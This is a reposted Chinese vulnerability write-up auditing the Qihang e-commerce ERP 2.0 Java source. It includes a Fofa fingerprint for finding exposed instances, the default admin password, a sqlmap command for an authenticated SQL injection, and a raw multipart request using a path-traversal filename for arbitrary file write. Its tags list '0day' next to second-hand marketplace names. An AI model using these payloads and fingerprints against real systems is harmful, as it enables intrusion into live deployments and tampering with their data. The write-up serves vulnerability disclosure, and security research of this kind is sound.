【JAVA代码审计】启航电商ERP2.0漏洞挖掘

admin 2025年4月23日00:41:07评论16 views字数 1456阅读4分51秒阅读模式
【JAVA代码审计】启航电商ERP2.0漏洞挖掘

点击上方蓝字关注我们 并设为星标

0x00 前言

█ 该文章来自零日防线社区用户投稿 

启航电商ERP系统2.0版本是一个完整开箱即用的开源电商ERP系统,经历1.0版本的迭代优化和客户使用验证。开发者可以直接部署即可使用。一个专注核心订单处理业务,主体功能包括:商品库管理(商品、SKU、分类、属性、供应商等)、订单库管理、店铺订单管理、发货管理、售后管理、库存管理、店铺管理(店铺管理、店铺商品管理、店铺电子面单账号管理、平台参数设置)等。

Fofa指纹:"static/css/chunk-libs.b880db92.css"
【JAVA代码审计】启航电商ERP2.0漏洞挖掘
【JAVA代码审计】启航电商ERP2.0漏洞挖掘
后台:
【JAVA代码审计】启航电商ERP2.0漏洞挖掘
安装部署:
启航电商ERP2.0系统
https://gitee.com/qiliping/qihangerp

mysql8
vue
  npm install
  set NODE_OPTIONS=--openssl-legacy-provider
  npm run dev
redis
127.0.0.1
  密码注释掉
nginx
  请求localhost:88/dev-api/xxx的请求转发到localhost:8088/xxx
  listen 88;
  location /prod-api/---->location /dev-api/

admin admin123

0x01 后台SQL注入漏洞

位于 SysDeptController.java 中存在传参,路由为 /api/sys-api/system/dept
【JAVA代码审计】启航电商ERP2.0漏洞挖掘
【JAVA代码审计】启航电商ERP2.0漏洞挖掘
Payload: 访问后台,抓包搜索
【JAVA代码审计】启航电商ERP2.0漏洞挖掘
python sqlmap.py -r 1.txt --batch -p params[dataScope] -t MYSQL --level5 --risk3
【JAVA代码审计】启航电商ERP2.0漏洞挖掘

0x02 后台任意文件写入

触发点位于 GoodsController.java 中 这里获取了File参数后上传,且没有做任何校验
【JAVA代码审计】启航电商ERP2.0漏洞挖掘
Payload:
POST /dev-api/api/oms-api/goods/goods_sku_import
Cookie: AdminToken=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImVkYTM0NmE0LTg1ZjctNDUwOC1hYzU5LTZiZDljMzY4ZmNkNCJ9.xEAke3QVZqxKar_ymolByj9JTVz2qVluTueuxiCW_n0tUegjwIW9IXvIQZjRFkkGLLeeXKpIal-ZZ_XhuhjpQ

------WebKitFormBoundaryZbLbp9JQe0WhOgj3
Content-Disposition: form-data; name="file";    filename="\..\..\mitan.txt"
Content-Type: image/png

11111111111
------WebKitFormBoundaryZbLbp9JQe0WhOgj3--
【JAVA代码审计】启航电商ERP2.0漏洞挖掘

0x03 源码下载

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

ERP源码关注公众号发送 250421 获取!

优质代码审计社区-零日防线 加入方式: 
https://mp.weixin.qq.com/s/EFgzGZSc7DGxXZc3DlALtw
【JAVA代码审计】启航电商ERP2.0漏洞挖掘

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):【JAVA代码审计】启航电商ERP2.0漏洞挖掘

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日00:41:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【JAVA代码审计】启航电商ERP2.0漏洞挖掘https://cn-sec.com/archives/3984084.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息